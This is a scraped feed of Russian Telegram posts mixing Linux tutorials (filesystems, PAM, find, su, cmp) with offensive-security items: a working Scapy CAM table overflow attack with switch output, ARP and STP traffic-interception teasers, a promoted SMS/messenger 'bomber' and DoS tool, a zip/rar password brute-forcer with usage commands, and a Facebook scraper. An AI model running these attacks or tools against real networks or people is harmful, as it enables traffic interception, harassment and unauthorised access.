Файловые системы Linux

Linux поддерживает много различных файловых систем. В качестве корневой файловой системы доступны: ext2, ext3, ext4, XFS, ReiserFS, JFS.

Ранее "родной" файловой системой Linux была ext2 (файловая система ext использовалась разве что в самых первых версиях Linux), затем ей на смену пришла журналируемая версия файловой системы — ext3.
Сегодня все современные дистрибутивы по умолчанию используют следующее поколение файловой системы — ext4.

Linux до сих пор поддерживает файловую систему ext, но она считается устаревшей, и рекомендуется воздержаться от ее использования.
Таким образом, в качестве корневой файловой системы и файловой системы других Linux-разделов используются файловые системы ext3, ext4, XFS, ReiserFS, JFS.
Все перечисленные файловые системы (кроме ext2) ведут журналы своей работы, что позволяет восстановить данные в случае сбоя.
Осуществляется это следующим образом — перед тем как выполнить операцию, журналируемая файловая система записывает эту операцию в журнал, а после выполнения операции удаляет запись из журнала.
Представим, что после занесения операции в журнал произошел сбой (например, выключили свет). Позже, когда сбой будет устранен, файловая система по журналу выполнит все действия, которые в него занесены.
Конечно, и это не всегда позволяет уберечься от последствий сбоя — стопроцентной гарантии никто не дает, но все же такая схема работы лучше, чем вообще ничего.
Файловые системы ext2 и ext3 совместимы. По сути, ext3 — та же ext2, только с журналом. Раздел ext3 могут читать программы (например, Total Commander и Ext2Fsd в Windows), рассчитанные на ext2. В свою очередь, ext4 — это усовершенствованная версия ext3.

В современных дистрибутивах по умолчанию задана файловая система ext4 (хотя в некоторых дистрибутивах все еще может использоваться ext3). При необходимости можно выбрать другие файловые системы.

Подробнее

@linuxkalii

Поиск и извлечение данных из файлов с Bulk Extractor

Bulk_Extractor — это инструмент Linux, который находит и извлекает данные такие, как адреса электронной почты, ip-адреса, данные кредитных карт, урлы сайтов и другую информацию с любого носителя или образа диска.

Это многопоточный инструмент, поэтому, в сравнении с другими подобными утилитами, работает намного быстрее. Кроме обычных текстовых файлов Bulk-Extractor может работать с архивами ZIP, GZIP, RAR и со сжатыми файлами типа PDF.

Тулза используется специалистами форензики и киберполицией для расследования различных форензик-кейсов, и может также работать с поврежденными файлами.

Bulk_Extractor уже установлен в Kali Linux. Можно сразу открывать справку:


bulk_extractor -h

Следующие сканеры используются по умолчанию. Для отключения сканеров, которые включены по умолчанию, используем параметр -x и после него указываем сканер.

-x aes — сканер поиска aes
-x base64 — сканер base64
-x elf — сканер elf
-x email — поиска адресов электронной почты
-x evtx — сканер evtx
-x exif — поиск данных exif
-x facebook — сканер поиска фейсбук
-x gps — поиск данных GPS
-x gzip — поиска в архивах gzip
-x httplogs — сканер httplogs
-x json — сканер json
-x kml — сканер kml
-x msxml — сканер msxml
-x ntfsindx — сканер ntfsindx
-x ntfslogfile — сканер ntfslogfile
-x ntfsmft — сканер ntfsmft
-x ntfsusn — сканер ntfsusn
-x pdf — сканер pdf
-x rar — поиск в файлах rar
-x sqlite — поиск в файлах sqlite
-x utmp — сканер utmp
-x vcard — сканер vcard

 Читать дальше

@linuxkalii

Модули аутентификации РАМ

РАМ (Pluggable Authentication Modules) — это подключаемые модули безопасности, предоставляющие администраторам дополнительные методы подтверждения подлинности пользователя. Механизм РАМ разработан давно — сначала он был экспериментальным, но потом прочно прижился в Linux.
Модули РАМ позволяют использовать несколько схем аутентификации. Практически все приложения, нуждающиеся в проверке подлинности пользователя (POP, SSH и др.), применяют РАМ. Используя дополнительные модули РАМ, можно изменить способ аутентификации. Обычно пользователь вводит имя пользователя и пароль для входа в систему. С помощью РАМ можно организовать аутентификацию по сетчатке глаза, отпечаткам пальцев или по голосу.

Файлы конфигурации РАМ находятся в каталоге /etc/pam.d, а библиотеки (модули) РАМ, реализующие дополнительные функции аутентификации, хранятся в каталоге /lib/security (или /Iib64/security — для 64-разрядных систем).

Подробнее

@linuxkalii

🎓 КАК СДЕЛАТЬ ЗАГРУЗОЧНУЮ ФЛЕШКУ UBUNTU

Мы разберёмся, как сделать загрузочную флешку Ubuntu в окружении дистрибутива Linux, причём неважно какого - интересные нам утилиты легко устанавливаются из официальных репозиториев. Также мы рассмотрим создание загрузочной флешки Ubuntu в Windows.

Я уточню: образ Ubuntu - это то, о чём мы говорим в статье, но на месте этого дистрибутива может быть любой другой образ Linux. Ничего не изменится, кроме размера USB-накопителя: в самом конце статьи мы затронем тему, как установить полноценную Ubuntu на флешку и получить полностью рабочую систему. Для этих целей нужно будет устройство с большим объёмом памяти.

Читать дальше

@linuxkalii

Прокачай карьеру в NLP и компьютерной лингвистике!

19 мая в 18:00 (по МСК) Мила Рванова, ведущий аналитик-исследователь Газпромбанка, расскажет:

• что такое Natural Language Processing,
• почему знаний в IT и математике может быть недостаточно,
• зачем NLP нужен бизнесу,
• что нужно знать для построения карьеры в NLP.

Лекция пройдет в Zoom – нужна регистрация: https://vk.cc/cdwv1p

🔐 Утилита для шифрования файлов Picocrypt

Picocrypt уме­ет не толь­ко шиф­ровать, но и генерить надеж­ные пароли и редак­тировать метадан­ные фай­лов. Если хочет­ся, мож­но эти метадан­ные даже пол­ностью уда­лить, но идея нап­равить потен­циаль­ных рас­сле­дова­телей форензики по лож­ному сле­ду выг­лядит более инте­рес­но.

Picocrypt к сожале­нию, пос­тавля­ется толь­ко с гра­фичес­ким интерфей­сом, но вряд ли это будет боль­шой проб­лемой. В README автор рас­хва­лива­ет свое тво­рение как чуть ли не луч­шее решение для шиф­рования чего угод­но: тут у нас и откры­тые исходни­ки, и малень­кий раз­мер, и сов­ремен­ный алго­ритм, и даже защита от пов­режде­ния дан­ных.

Пол­ную срав­нитель­ную таб­лицу мож­но почитать на картинке или в репози­тории про­екта.

https://spy-soft.net/picocrypt/

@linuxkalii

🔐 Асимметричное шифрование в python

Читать

Код

💻 Используем STP Root Hijacking для перехвата трафика

При атаке на каналь­ном уров­не, можно переп­рыгнуть через все средс­тва защиты, нас­тро­енные на более высоких уров­нях. В данной статье мы с вами рассмотрим один из векторов атак на этот самый низ­кий уро­вень сети — перехват трафика с помощью STP Root Hijacking.

Для понимания этого материала нужно иметь бэкграунд знаний компьютерных сетей, в частности знать как работает коммутация и маршрутизация.

Читть дальше

@linuxkalii

Для поиска файлов в Linux служит команда find. Это довольно сильная утилита со сложным синтаксисом.

Мощность команды find заключается во множестве самых разных параметров поиска, которые из-за их количества не так-то просто запомнить. К тому же find может выполнять операции над найденными файлами. Например, вы можете найти временные файлы и сразу удалить их.

Несколько примеров использования этой команды:

□ найти файлы с именем a.out (точнее, в имени которых содержится строка «a.out»), поиск начать с корневого каталога (/):
find / -name a.out

□ найти файлы по маске *. txt:
find / -name '*.txt'

□ найти файлы нулевого размера, поиск начать с текущего каталога (.):
find . -size 0с
Кстати, для поиска пустых файлов намного проще использовать параметр -empty:
find . -empty

□ найти файлы, размер которых от 100 до 150 Мбайт, поиск производить в домашнем каталоге и всех его подкаталогах:
find ~ -size +100М -size -150М

□ найти все временные файлы и удалить их (для каждого найденного файла будет запущена команда rm):
find / -name *.tmp -ok rm {} \

Вместо параметра -ok можно использовать параметр -ехес, который также запускает указанную после него команду, но не запрашивает подтверждение выполнения этой команды для каждого файла.

Подробнее

@linuxkalii

📲 Сетевая разведка и перехват трафика с помощью ARP

При пентесте канального уровня важной частью является сетевая разведка. В сегодняшней статье поговорим о технике сетевой разведке (ARP Harvesting) и перехвате трафика с помощью ARP (ARP Cache Poisoning).

Сетевая разведка и перехват трафика с помощью ARP
ARP Harvesting
Про­токол ARP может быть очень полезен в рам­ках сетевой раз­ведки. Ска­ниро­вание ARP поз­воля­ет про­вес­ти перечис­ление активных хос­тов и име­ет неболь­шое пре­иму­щес­тво перед ICMP-ска­ниро­вани­ем, пос­коль­ку тра­фик ICMP в кор­поратив­ной сети может быть огра­ничен, а то и вов­се вык­лючен.

Проб­лема ска­ниро­вания ARP в том, что это очень шум­ный спо­соб сетевой раз­ведки. С этим спо­собом нуж­но быть осто­рож­ным, что­бы не спро­воци­ровать тре­вогу сис­тем безопас­ности IPS/IDS. Да и на пор­те, к которо­му ты под­клю­чен, может быть скон­фигури­рован Storm Control, бло­киру­ющий порт при ано­маль­ном широко­веща­тель­ном тра­фике (тра­фик про­токо­ла ARP — широко­веща­тель­ный).

C помощью ARPScanner.py можем обна­ружить активные хос­ты в сети 10.1.1.0/24 и их MAC-адре­са. В моем слу­чае тес­товая сеть малень­кая, но тем не менее.

c0ldheim@PWN:~$ sudo python3 ARPScanner.py -t 10.1.1.0/24 -i eth0

Подробнее

@linuxkalii

☠️ Kali Linux Tutorial – Linux Гайд

Kali Linux. (Это написано на главной странице Kali.org в самом верху страницы.) Что вы получаете из этого утверждения? Вы заметили это: APTD (Распространение расширенного тестирования на проникновение)? Здесь буквально нет термина «взлом». Kali Linux такой же, как и другие дистрибутивы Linux. Проще говоря, это дистрибутив Linux, наполненный инструментами безопасности и ориентированный на экспертов по сетевой и компьютерной безопасности. Однако использование Kali Linux сосредоточено только на безопасности и криминалистике.

Читать дальше

@linuxkalii

Работа с каталогами 

mkdir <каталог> Создание каталога
cd <каталог> Изменение каталога
ls <каталог> Вывод содержимого каталога
rmdir <каталог> Удаление пустого каталога
rm -r <каталог> Рекурсивное удаление каталога

При указании имени каталога можно использовать следующие символы:

□ . — означает текущий каталог. Если вы введете команду cat ./file, то она выведет файл file, который находится в текущем каталоге;

□ .. — родительский каталог. Например, команда cd .. переведет вас на один уровень вверх по дереву файловой системы;

□ ~ — домашний каталог пользователя.

Больше команд

@linuxkalii

Beast Bomber💥 - многофункциональный бомбер на Python

Возможности:

🌵 SMS рассыльщик (работает лучше с proxy)

🌵 Email рассыльщик

🌵 WhatsApp рассыльщик

🌵 Discord рассыльщик

🌵 Telegram рассыльщик

🌵 DoS

Инструкция на русском/английском:

⚙️ GitHub

⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.

Дальше

@linuxkalii

🔥 Полезные библиотеки Python. Facebook Friend List Scraper

Facebook Friend List Scraper - OSINT инструмент для сбора имен и никнеймов пользователей из больших списков друзей Facebook без ограничения скорости.

📝 Статья

⚙️ GitHub/Инструкция

@pro_python_code

🖇Что делает CMP в Linux?


Команда cmp в Linux / UNIX используется для побайтного сравнения двух файлов и помогает определить, идентичны ли эти два файла или нет.

В чем разница между diff и cmp в Unix?
diff означает разницу. Эта команда используется для отображения различий в файлах путем сравнения файлов построчно. В отличие от других участников, cmp и comm, он сообщает нам какие строки в одном файле нужно изменить, чтобы два файла одинаковые.

В чем разница между командами comm и cmp в Linux?
Различные способы сравнения двух файлов в Unix

# 1) cmp: эта команда используется для посимвольного сравнения двух файлов. Пример: добавить разрешение на запись для пользователя, группы и других для file1. # 2) comm: используется эта команда сравнить два отсортированных файла.

В чем разница между командой common и cmp?
команда diff используется для преобразования одного файла в другой, чтобы сделать их идентичными, а comm используется для отображения общих элементов в обоих файлах. Объяснение: команда cmp по умолчанию отображает только первое несоответствие, которое встречается в обоих файлах.

Какой параметр используется с командой cmp для ограничения количества сравниваемых байтов?
5. Как ограничить количество байтов для сравнения. Инструмент также позволяет вам ограничить количество байтов, которые вы хотите сравнить - например, вы можете сравнить не более 25 или 50 байтов. Это можно сделать с помощью -n параметр командной строки.

Как вы используете cmp?
Когда cmp используется для сравнения двух файлов, он сообщает на экран о местоположении первого несоответствия, если разница обнаружена и если разница не обнаружена, то есть сравниваемые файлы идентичны. cmp не отображает сообщения и просто возвращает подсказку, если сравниваемые файлы идентичны.

Как я могу сравнить два файла в Linux?
Сравнение файлов (команда diff)

Чтобы сравнить два файла, введите следующее: diff chap1.bak chap1. Это отображает различия между chap1. …
Чтобы сравнить два файла, игнорируя различия в количестве пробелов, введите следующее: diff -w prog.c.bak prog.c.
Почему мы используем chmod в Linux?
Команда chmod (сокращение от режима изменения): используется для управления правами доступа к файловой системе в Unix и Unix-подобных системах. Существует три основных разрешения или режима файловой системы для файлов и каталогов: чтение (r)

Подробнее

@linuxkalii

🔥 CompressedCrack Python скрипт для подбора паролей к zip и rar архивам.

CompressedCrack - простой и эффективный скрипт для подбора паролей к zip и rar архивам.

Установка:
$ git clone https://github.com/thanhminh6996/CompressedCrack.git

$ cd ./CompressedCrack

Использование:
Нас интересует скрипт crack.py который принимает несколько параметров:

$ python crack.py -i file_name min_character max_character characters

🌵 -i file_name : путь до архива.
🌵 min_character: минимальное количество символов в пароле.
🌵 max_character: максимальное количество символов в пароле.
🌵 characters: используемые в пароле символы по которым будет осуществляться перебор, 123qwerty!@$ и т.д.

$ python crack.py -i file.zip 1 5 1234567890

⚙️ GitHub/Инструкция

@pro_python_code

📍 ЛУЧШИЕ МОДИФИЦИРОВАННЫЕ ЯДРА LINUX

Ядро Linux – это основа любого дистрибутива, а учитывая их количество, нет ничего удивительного в том, что разработчики модифицируют его под себя. Большая часть дистрибутивов содержит патчи для лучшей совместимости со своими компонентами.

Есть и такие ядра, которые также модифицируют, но при этом не привязывают к определённому дистрибутиву. О таких ядрах и пойдёт речь. Одни из них повышают производительность, другие снижают задержки, третьи нацелены на высокий уровень безопасности. В этой статье мы собрали самые интересные модифицированные ядра Linux.

Ядро pf-kernel содержит в себе несколько значимых патчей. Вот некоторые из них:

патч для лучшей работы компилятора GCC;
патч против утечек памяти;
патч для создания виртуальных видеоустройств (полезно при проведении стримов);
патч BBR для эффективной обработки пакетов TCPи множество других более мелких улучшений.

Ядро примечательно тем, что имеются сборки для различных архитектур процессоров. Конечно, большой прибавки производительности это не даст, но на некоторых ноутбуках такое ядро позволит более эффективно использовать энергосберегающие функции.

Ядро XanMod во многом похоже на pf-kernel, но содержит даже большее количество патчей. Многие из них направлены на повышение производительности слоёв совместимости Wine и Anbox. Это ядро может быть полезно любителям игр. Прирост кадров в секунду в некоторых играх превышает 10%, что может существенно повысить комфорт в игре.

Читать дальше


@linuxkalii

КОМАНДА SU LINUX
Команда имеет следующий синтаксис:

su [options] [-] [user]

Если вызов команды происходит без аргументов, то происходит смена пользователя оболочки shell на суперпользователя root. Программа выдаст приглашение ввода пароля, если пароль будет верным, то текущим пользователем станет root.

options — некоторые дополнительные возможности команды. Мы их рассмотрим ниже:
[-] — смена контекста выполнения оболочки на контекст указанного пользователя. Переменные $PATH, $HOME, $SHELL, $USER, $LOGNAME содержат значения, характерные для указанного пользователя. Домашняя папка пользователя меняется на другую.
user — имя пользователя, под которым продолжит работать командная оболочка.
Основные опции команды su:

-c, --command=command — запускает приложение под указанным аккаунтом;
-s, --shell=shell — происходит запуск для заданного пользователя указанной оболочки;
-, -l, --login — смена контекста выполнения на контекст заданного пользователя, аналогична смене пользователя системы для shell;
-g, --group=group — вызов пользователя, состоящего в заданной группе. Используется только для пользователя root;
-h, --help — вызов справки для команды.
Далее давайте рассмотрим примеры работы с утилитой su.

ПРИМЕРЫ ИСПОЛЬЗОВАНИЯ SU
Смена пользователя на суперпользователя root, без смены окружения оболочки:

su

Обратите внимание, что здесь вам нужно набрать пароль не своего пользователя, а именно того, от имени которого вы хотите авторизоваться. В данном случае, пользователя root. Если вы получаете ошибку сбой при проверке подлинности su linux, то это может означать, что либо вы ввели пароль неверно, либо пароль для этого пользователя не задан. Такое можно встретить у пользователя root в Ubuntu и Linux Mint. Информацию о том как установить пароль вы можете найти в этой статье. Смена пользователя на суперпользователя root со сменой параметров окружения оболочки:

su - Смена пользователя на пользователя user01:

@linuxkalii

Использование атаки CAM Table Overflow в пентесте

Атака CAM Table Overflow
Иног­да такая ата­ка называ­ется перепол­нени­ем таб­лицы MAC-адре­сов. Прин­цип этой ата­ки сос­тоит в том, что­бы выз­вать перепол­нение ком­мутаци­онной мат­рицы. В слу­чае чего ком­мутатор, гру­бо говоря, прев­раща­ется в хаб и начина­ет рас­сылать пос­тупа­ющие кад­ры во все пор­ты, что вызыва­ет иде­аль­ные усло­вия для перех­вата тра­фика.

Вызывать перепол­нение очень прос­то, ведь у ком­мутато­ров огра­ничен раз­мер таб­лиц MAC-адре­сов. При запол­нении таб­лицы MAC-адре­сов зло­умыш­ленник смо­жет видеть все рас­сыла­емые кад­ры из всех пор­тов.

CAM Table Overflow
Вос­поль­зуем­ся Scapy, что­бы про­вес­ти такую ата­ку. В качес­тве MAC-адре­са источни­ка пусть будет ран­домизи­рован­ный MAC-адрес, каж­дый новый генери­рующий­ся кадр будет с новым MAC-адре­сом. MAC-адре­сов наз­начения это тоже каса­ется.

Да­лее с помощью метода sendp выпол­няем рас­сылку фик­тивных кад­ров Ethernet. Задав loop = 1, зацик­лим отправ­ку этих кад­ров.


>>> malicious_frames = Ether(src=RandMAC(), dst=RandMAC())
>>> sendp(malicious_frames, iface="eth0", loop=1, verbose=1)

Дамп тра­фика в момент про­веде­ния ата­ки
Таб­лица MAC-адре­сов ком­мутато­ра до ата­ки:

CoreSW#show mac address-table count

Mac Entries for Vlan 1:
---------------------------
Dynamic Address Count : 3
Static Address Count : 0
Total Mac Addresses : 3

Total Mac Address Space Available: 7981
Таб­лица MAC-адре­сов ком­мутато­ра пос­ле ата­ки:

CoreSW#show mac address-table count

Mac Entries for Vlan 1:
---------------------------
Dynamic Address Count : 7981
Static Address Count : 0
Total Mac Addresses : 7981

Total Mac Address Space Available: 7981

По­ка таб­лица MAC-адре­сов не запол­нена, ком­мутатор будет переда­вать все кад­ры из всех пор­тов, исполь­зуя широко­веща­тель­ную рас­сылку.

Статья

@linuxkalii